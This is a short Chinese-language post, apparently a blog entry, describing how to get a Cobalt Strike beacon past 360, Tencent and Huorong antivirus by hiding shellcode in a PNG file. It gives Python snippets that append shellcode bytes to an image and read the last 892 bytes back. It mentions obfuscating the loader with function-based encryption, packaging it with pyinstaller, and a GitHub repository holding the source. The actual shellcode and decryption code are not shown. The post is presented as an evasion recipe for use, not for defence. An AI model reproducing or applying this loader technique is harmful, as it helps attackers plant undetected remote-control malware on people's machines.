过了360,腾讯,火绒,正常上线cobalt strike,来说一下免杀原理
主要使用的是图片马
首先创建一个给图片加马的脚本,准备一张照片,取名a.png
(资料图片)
list = b"...shellcode"png = open('a.png','ab+')#追加写入png.write(list)png.close()print('写入完成')
在图片最后写入shellcode的二进制编码
然后创建一个读取马的脚本
png = open('a.png','rb')#二进制方式读取shellcode = png.read()[-892:]#这里是shellcode的长度
然后给她睡一会也行,给她加个base64也行,这里我选择了python的一个奇怪的特性
一开始怎么加密都过不了火绒,然后就使用了函数加密
看起来是不是很混乱
这是解密区
最后用pyinstaller生成一下
正常过360,火绒,腾讯管家
这些源码已上传至git
https://github.com/soryecker/PicBypass
